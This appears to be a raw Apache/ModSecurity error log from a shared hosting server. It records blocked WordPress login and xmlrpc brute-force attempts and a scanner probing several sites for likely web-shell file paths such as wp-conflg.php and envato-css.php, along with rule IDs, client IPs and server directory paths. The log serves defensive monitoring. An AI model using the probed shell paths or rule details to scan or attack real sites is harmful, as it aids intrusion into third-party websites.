[Tue May 26 17:13:14.342256 2026] [security2:error] [pid 860158:tid 860192] [remote 103.11.102.106:50414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWHUoYFlz_JJsUnscK6RgAAlCE"]
[Tue May 26 17:13:14.358647 2026] [security2:error] [pid 860158:tid 860339] [client 49.37.102.153:53073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 153.102.37.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/xmlrpc.php"] [unique_id "ahWHUoYFlz_JJsUnscK6RQAAALg"]
[Tue May 26 17:13:14.358855 2026] [security2:error] [pid 860158:tid 860339] [client 49.37.102.153:53073] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "azurmediatec.com"] [uri "/xmlrpc.php"] [unique_id "ahWHUoYFlz_JJsUnscK6RQAAALg"]
[Tue May 26 17:13:15.337777 2026] [security2:error] [pid 860158:tid 860390] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHUoYFlz_JJsUnscK6VQAAAOs"]
[Tue May 26 17:13:15.883989 2026] [security2:error] [pid 860158:tid 860337] [client 66.249.64.43:36900] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHUoYFlz_JJsUnscK6VgAAALY"], referer: https://mosykay.com/prizes/197138430
[Tue May 26 17:13:16.868254 2026] [security2:error] [pid 860158:tid 860322] [client 45.86.200.24:28041] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-admin/images/wp-conflg.php"] [unique_id "ahWHVIYFlz_JJsUnscK6ggAAAKc"]
[Tue May 26 17:13:17.139635 2026] [security2:error] [pid 860158:tid 860405] [client 114.119.156.102:28047] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "adityacreations.co.in"] [uri "/section3"] [unique_id "ahWHVYYFlz_JJsUnscK6lQAAAPo"], referer: https://adityacreations.co.in/section3
[Tue May 26 17:13:17.436161 2026] [security2:error] [pid 860158:tid 860332] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHVIYFlz_JJsUnscK6iAAAALE"]
[Tue May 26 17:13:18.320397 2026] [security2:error] [pid 860158:tid 860350] [client 45.86.200.13:49287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahWHVoYFlz_JJsUnscK6sAAAAMM"]
[Tue May 26 17:13:19.599264 2026] [security2:error] [pid 860158:tid 860352] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHV4YFlz_JJsUnscK6wgAAAMU"]
[Tue May 26 17:13:20.079924 2026] [security2:error] [pid 860158:tid 860345] [client 45.86.200.20:30451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/plugins/envato-css.php"] [unique_id "ahWHV4YFlz_JJsUnscK60gAAAL4"]
[Tue May 26 17:13:20.780357 2026] [security2:error] [pid 860158:tid 860350] [client 45.86.200.39:55343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/classwithtostring.php"] [unique_id "ahWHWIYFlz_JJsUnscK66QAAAMM"]
[Tue May 26 17:13:21.279129 2026] [security2:error] [pid 860158:tid 860370] [client 45.86.200.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHWYYFlz_JJsUnscK6-gAAANc"]
[Tue May 26 17:13:21.389905 2026] [security2:error] [pid 860158:tid 860342] [client 203.194.101.7:49273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHWYYFlz_JJsUnscK7AgAAALs"]
[Tue May 26 17:13:21.390035 2026] [security2:error] [pid 860158:tid 860342] [client 203.194.101.7:49273] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHWYYFlz_JJsUnscK7AgAAALs"]
[Tue May 26 17:13:21.651390 2026] [security2:error] [pid 860158:tid 860396] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHWYYFlz_JJsUnscK6_QAAAPE"]
[Tue May 26 17:13:21.703356 2026] [security2:error] [pid 860158:tid 860344] [client 103.174.5.177:65182] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHWYYFlz_JJsUnscK7AwAAAL0"]
[Tue May 26 17:13:21.703489 2026] [security2:error] [pid 860158:tid 860344] [client 103.174.5.177:65182] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHWYYFlz_JJsUnscK7AwAAAL0"]
[Tue May 26 17:13:21.930413 2026] [security2:error] [pid 860158:tid 860393] [client 45.86.200.41:62053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 41.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/index/function.php"] [unique_id "ahWHWYYFlz_JJsUnscK7EAAAAO4"]
[Tue May 26 17:13:22.350365 2026] [security2:error] [pid 860158:tid 860309] [client 45.79.207.111:44999] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cuatrodoce.com.mx"] [uri "/index.php"] [unique_id "ahWHWoYFlz_JJsUnscK7FAAAAJo"]
[Tue May 26 17:13:23.092874 2026] [security2:error] [pid 860158:tid 860380] [client 43.139.137.13:57634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.137.139.43.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWHWoYFlz_JJsUnscK7HgAAAOE"]
[Tue May 26 17:13:23.914786 2026] [security2:error] [pid 860158:tid 860403] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHW4YFlz_JJsUnscK7NAAAAPg"]
[Tue May 26 17:13:26.342520 2026] [security2:error] [pid 860158:tid 860318] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHXYYFlz_JJsUnscK7eAAAAKM"]
[Tue May 26 17:13:28.103579 2026] [security2:error] [pid 860158:tid 860411] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHX4YFlz_JJsUnscK7ogAAAQA"]
[Tue May 26 17:13:28.628715 2026] [security2:error] [pid 860158:tid 860214] [remote 95.216.117.13:38334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWHYIYFlz_JJsUnscK7tgAAiTc"]
[Tue May 26 17:13:30.176229 2026] [security2:error] [pid 860158:tid 860309] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHYYYFlz_JJsUnscK73wAAAJo"]
[Tue May 26 17:13:31.764088 2026] [security2:error] [pid 860158:tid 860327] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHY4YFlz_JJsUnscK8BwAAAKw"]
[Tue May 26 17:13:31.827678 2026] [security2:error] [pid 860158:tid 860373] [client 203.194.101.7:49638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHY4YFlz_JJsUnscK8FAAAANo"]
[Tue May 26 17:13:31.827777 2026] [security2:error] [pid 860158:tid 860373] [client 203.194.101.7:49638] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHY4YFlz_JJsUnscK8FAAAANo"]
[Tue May 26 17:13:32.789811 2026] [security2:error] [pid 860158:tid 860293] [client 149.20.244.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHZIYFlz_JJsUnscK8NAAAAIo"], referer: https://www.anujtradingco.com/
[Tue May 26 17:13:33.949585 2026] [security2:error] [pid 860158:tid 860333] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHZYYFlz_JJsUnscK8RgAAALI"]
[Tue May 26 17:13:34.016423 2026] [security2:error] [pid 860158:tid 860336] [client 103.174.5.177:63618] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHZYYFlz_JJsUnscK8SgAAALU"]
[Tue May 26 17:13:34.016565 2026] [security2:error] [pid 860158:tid 860336] [client 103.174.5.177:63618] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHZYYFlz_JJsUnscK8SgAAALU"]
[Tue May 26 17:13:34.049281 2026] [security2:error] [pid 860158:tid 860352] [client 149.20.244.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHZYYFlz_JJsUnscK8VgAAAMU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460166&moderation-hash=16e968c3d92b66f1f9cf970575822f5d
[Tue May 26 17:13:34.163431 2026] [security2:error] [pid 860158:tid 860337] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHZoYFlz_JJsUnscK8WQAAALY"]
[Tue May 26 17:13:34.741875 2026] [autoindex:error] [pid 860158:tid 860315] [client 192.175.111.248:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:35.040037 2026] [autoindex:error] [pid 860158:tid 860394] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/maint/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:35.335229 2026] [security2:error] [pid 860158:tid 860414] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHZ4YFlz_JJsUnscK8fQAAAQM"]
[Tue May 26 17:13:35.578645 2026] [security2:error] [pid 860158:tid 860310] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHZ4YFlz_JJsUnscK8hgAAAJs"]
[Tue May 26 17:13:35.824309 2026] [autoindex:error] [pid 860158:tid 860354] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:36.148209 2026] [security2:error] [pid 860158:tid 860400] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHaIYFlz_JJsUnscK8mQAAAPU"]
[Tue May 26 17:13:36.402793 2026] [security2:error] [pid 860158:tid 860309] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHaIYFlz_JJsUnscK8ogAAAJo"]
[Tue May 26 17:13:36.558028 2026] [security2:error] [pid 860158:tid 860385] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHaIYFlz_JJsUnscK8nAAAAOY"]
[Tue May 26 17:13:36.727124 2026] [security2:error] [pid 860158:tid 860322] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHaIYFlz_JJsUnscK8rAAAAKc"]
[Tue May 26 17:13:36.885897 2026] [security2:error] [pid 860158:tid 860331] [client 31.57.184.107:57592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "g.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWHaIYFlz_JJsUnscK8sQAAALA"], referer: https://www.google.com/
[Tue May 26 17:13:36.966001 2026] [security2:error] [pid 860158:tid 860289] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHaIYFlz_JJsUnscK8tgAAAIY"]
[Tue May 26 17:13:37.191000 2026] [security2:error] [pid 860158:tid 860392] [client 185.231.154.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHaYYFlz_JJsUnscK8vwAAAO0"], referer: http://anujtradingco.com/pages/coming-soon/
[Tue May 26 17:13:37.274578 2026] [security2:error] [pid 860158:tid 860333] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHaYYFlz_JJsUnscK8wwAAALI"]
[Tue May 26 17:13:37.300972 2026] [security2:error] [pid 860158:tid 860234] [remote 209.42.20.53:48642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHaYYFlz_JJsUnscK8wAAAs0s"]
[Tue May 26 17:13:37.531557 2026] [security2:error] [pid 860158:tid 860297] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHaYYFlz_JJsUnscK8zwAAAI4"]
[Tue May 26 17:13:37.574008 2026] [security2:error] [pid 860158:tid 860249] [remote 18.190.7.192:32922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWHaYYFlz_JJsUnscK8zAAAo1o"]
[Tue May 26 17:13:37.773815 2026] [autoindex:error] [pid 860158:tid 860313] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:38.012879 2026] [security2:error] [pid 860158:tid 860407] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHaYYFlz_JJsUnscK80gAAAPw"]
[Tue May 26 17:13:38.098401 2026] [security2:error] [pid 860158:tid 860366] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHaoYFlz_JJsUnscK86QAAANM"]
[Tue May 26 17:13:38.436434 2026] [security2:error] [pid 860158:tid 860323] [client 31.57.184.107:59447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "g.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWHaoYFlz_JJsUnscK88gAAAKg"]
[Tue May 26 17:13:38.569698 2026] [autoindex:error] [pid 860158:tid 860303] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/style-engine/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:38.998585 2026] [security2:error] [pid 860158:tid 860302] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHaoYFlz_JJsUnscK9CwAAAJM"]
[Tue May 26 17:13:39.502153 2026] [security2:error] [pid 860158:tid 860309] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHa4YFlz_JJsUnscK9HQAAAJo"]
[Tue May 26 17:13:39.883615 2026] [autoindex:error] [pid 860158:tid 860306] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:40.296236 2026] [autoindex:error] [pid 860158:tid 860320] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:40.558803 2026] [security2:error] [pid 860158:tid 860311] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHbIYFlz_JJsUnscK9RgAAAJw"]
[Tue May 26 17:13:40.743191 2026] [security2:error] [pid 860158:tid 860395] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHbIYFlz_JJsUnscK9QwAAAPA"]
[Tue May 26 17:13:41.066315 2026] [security2:error] [pid 860158:tid 860388] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHbIYFlz_JJsUnscK9VwAAAOk"]
[Tue May 26 17:13:41.260151 2026] [autoindex:error] [pid 860158:tid 860400] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:41.442878 2026] [autoindex:error] [pid 860158:tid 860366] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
